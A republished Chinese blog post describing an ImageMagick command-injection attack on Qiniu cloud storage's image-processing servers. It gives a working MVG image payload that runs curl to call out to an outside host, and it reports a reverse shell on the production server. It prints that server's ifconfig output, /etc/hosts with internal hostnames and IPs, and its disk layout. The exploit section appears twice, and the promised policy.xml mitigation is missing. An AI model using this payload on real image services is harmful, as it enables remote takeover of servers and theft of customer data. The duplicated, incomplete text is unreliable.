当前位置：移动技术网 > 网络运营>安全>企业安全 > 七牛云存储远程命令执行漏洞影响图片处理服务器

七牛云存储远程命令执行漏洞影响图片处理服务器

2018年04月03日 | 移动技术网网络运营 | 我要评论

七牛云存储在业务中使用了 ImageMagick 对程序进行处理，由于该软件（扩展）存在命令执行漏洞，所以导致可以直接获取七牛云存储服务器权限。

漏洞详情请参考：

http://www.openwall.com/lists/oss-security/2016/05/03/18

具体利用过程：调用七牛云存储上传图片，图片内容为：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
pop graphic-context

我的服务器 web 日志能够收到如下请求：

183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

证明服务器能够执行命令，反弹 shell 到本地：

[email protected]:/home/qboxserver$ /sbin/ifconfig 
/sbin/ifconfig
bond0     Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
          inet addr:192.168.39.56  Bcast:192.168.39.255  Mask:255.255.255.0
          inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
          RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
          TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2185589994172355 (2.1 PB)  TX bytes:2267435507197833 (2.2 PB)

eth0      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
          TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1137441591036452 (1.1 PB)  TX bytes:1174420660158860 (1.1 PB)
          Memory:df7a0000-df7c0000 

eth2      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
          TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1048148403135903 (1.0 PB)  TX bytes:1093014847038820 (1.0 PB)
          Memory:df920000-df940000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
          TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:271458766242099 (271.4 TB)  TX bytes:271458766242099 (271.4 TB)

[email protected]:/home/qboxserver$

[email protected]:/home/qboxserver$ cat /etc/hosts
cat /etc/hosts
127.0.0.1               localhost               nb443
::1             ip6-localhost           ip6-loopback
fe00::0         ip6-localnet
ff00::0         ip6-mcastprefix
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.1.188           salt            puppetmaster
192.168.33.200          zabbixserver            bosunserver             fileserver.qbox.me
192.168.34.129          nb.fileserver.qbox.me
192.168.48.248          ntp.ubuntu.com

172.16.77.202 qmaster2


172.16.77.201 qmaster1

172.16.77.201 qmaster1
172.16.77.202 qmaster2

[email protected]:/home/qboxserver$ df -h
df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda5       279G   75G  190G  29% /
udev             16G   12K   16G   1% /dev
tmpfs           6.3G  392K  6.3G   1% /run
none            5.0M     0  5.0M   0% /run/lock
none             16G   60K   16G   1% /run/shm
/dev/sde1       3.7T  3.2T  293G  92% /disk1
/dev/sdc1       3.7T  3.3T  220G  94% /disk2
/dev/sdb1       3.7T  3.3T  254G  93% /disk3
/dev/sdd1       3.7T  3.2T  283G  93% /disk4
/dev/sdg1       3.7T  3.3T  203G  95% /disk5
/dev/sdi1       3.7T  3.2T  278G  93% /disk6
/dev/sdh1       3.7T  3.2T  285G  92% /disk7
/dev/sdj1       3.7T  3.3T  245G  94% /disk8
/dev/sdk1       3.7T  3.2T  301G  92% /disk9
/dev/sdl1       3.7T  3.2T  262G  93% /disk10
/dev/sdm1       3.7T  3.3T  256G  93% /disk11
/dev/sdf1       3.7T   56G  3.4T   2% /disk12

挂载了这么多磁盘，有将近 40T 的数据，猜测都是客户上传的静态资源。

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
pop graphic-context

我的服务器 web 日志能够收到如下请求：

183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

证明服务器能够执行命令，反弹 shell 到本地：

[email protected]:/home/qboxserver$ /sbin/ifconfig 
/sbin/ifconfig
bond0     Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
          inet addr:192.168.39.56  Bcast:192.168.39.255  Mask:255.255.255.0
          inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
          RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
          TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2185589994172355 (2.1 PB)  TX bytes:2267435507197833 (2.2 PB)

eth0      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
          TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1137441591036452 (1.1 PB)  TX bytes:1174420660158860 (1.1 PB)
          Memory:df7a0000-df7c0000 

eth2      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
          TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1048148403135903 (1.0 PB)  TX bytes:1093014847038820 (1.0 PB)
          Memory:df920000-df940000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
          TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:271458766242099 (271.4 TB)  TX bytes:271458766242099 (271.4 TB)

[email protected]:/home/qboxserver$

[email protected]:/home/qboxserver$ cat /etc/hosts
cat /etc/hosts
127.0.0.1               localhost               nb443
::1             ip6-localhost           ip6-loopback
fe00::0         ip6-localnet
ff00::0         ip6-mcastprefix
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.1.188           salt            puppetmaster
192.168.33.200          zabbixserver            bosunserver             fileserver.qbox.me
192.168.34.129          nb.fileserver.qbox.me
192.168.48.248          ntp.ubuntu.com

172.16.77.202 qmaster2


172.16.77.201 qmaster1

172.16.77.201 qmaster1
172.16.77.202 qmaster2

[email protected]:/home/qboxserver$ df -h
df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda5       279G   75G  190G  29% /
udev             16G   12K   16G   1% /dev
tmpfs           6.3G  392K  6.3G   1% /run
none            5.0M     0  5.0M   0% /run/lock
none             16G   60K   16G   1% /run/shm
/dev/sde1       3.7T  3.2T  293G  92% /disk1
/dev/sdc1       3.7T  3.3T  220G  94% /disk2
/dev/sdb1       3.7T  3.3T  254G  93% /disk3
/dev/sdd1       3.7T  3.2T  283G  93% /disk4
/dev/sdg1       3.7T  3.3T  203G  95% /disk5
/dev/sdi1       3.7T  3.2T  278G  93% /disk6
/dev/sdh1       3.7T  3.2T  285G  92% /disk7
/dev/sdj1       3.7T  3.3T  245G  94% /disk8
/dev/sdk1       3.7T  3.2T  301G  92% /disk9
/dev/sdl1       3.7T  3.2T  262G  93% /disk10
/dev/sdm1       3.7T  3.3T  256G  93% /disk11
/dev/sdf1       3.7T   56G  3.4T   2% /disk12

挂载了这么多磁盘，有将近 40T 的数据，猜测都是客户上传的静态资源。

解决方案：

使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码：

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

麦咖啡 (mcafee) VSE 8.5 防止Serv-U提权

Serv-U现在很多服务器上都用着.所以对他的攻击也太多了.最经典的莫过于Serv-U提权 ... 09-07-20 [阅读全文]
麦咖啡(mcafee) VSE 8.5 服务器防挂马心得

正好今天在查看服务器日志的时候.发现McAfee又一次成功的拦截了挂马,特给大家分享下。 ... 09-07-20 [阅读全文]
麦咖啡(mcafee)用8.5I做的防挂马心得

家好，我是新手，我的站这几天经常被挂马，每次都很麻烦，特郁闷，也不知道是那里出的问题，只要借用mcafee了，首先我们进入控制台... 09-07-20 [阅读全文]
mcafee 企业版8.0 i设置指南(图文)

这里要说的就是是否扫描压缩文件，我的建议是不扫描，因为扫描他们会花去大量的时间，即时里面有病毒，也需要先解压出来，就是直接运行也要解压到临时文件夹，这个时候麦咖... [阅读全文]
mcafee 打造安全的windows服务器安全设置图文说明

为了让服务器更安全，不如提取，后门等程序的运行，下面的设置对于服务器来说是非常必要，这里是一些引导设置，更多的大家可以自行发挥。... 10-05-12 [阅读全文]
利用麦咖啡(McAfee)对服务器Web站点进行有效安全设置与管理

本文主要拿ASP文件做演示,大家可以修改E:\wwwroot**.asp为我们所希望限制的文件格式... 10-09-23 [阅读全文]
mcafee 新手入门教程之如何输入密码解除锁定

这篇文章主要是针对脚本之家服务器安全设置的用户准备的。我们配置以后会给客户一个详细的说明，方法大家使用，不懂的可以联系我们。包教会。... 11-03-20 [阅读全文]
win系统自带不起眼但又很强的杀毒工具

Windows系统集成了无数的工具，它们各司其职，满足用户不同的应用需求。其实这些工具“多才多艺”，如果你有足够的想象力并且善于挖掘，你会发现它们除了本行之外还... [阅读全文]
Mcafee8.5i 安装使用设置详解[图文]

Mcafee的精髓就在于规则设置。只要访问保护规则设置得好，几乎可以说是能够做倒百毒不侵。但它却是所有杀软中设置最为复杂，软件界面也不太符合我们的使用习惯的软件... [阅读全文]
微软有史以来最严重漏洞的弥补

6月10日凌晨微软发布了有史以来严重漏洞补丁升级公告！我们先看看严重会对用户直接造成经济损失的漏洞情况：严重-MS09-022：Windows 打印后台处理... [阅读全文]

网友评论


验证码：

七牛云存储远程命令执行漏洞影响图片处理服务器

2018年04月03日 | 移动技术网网络运营 | 我要评论

解决方案：

您可能感兴趣的文章:

相关文章:

网友评论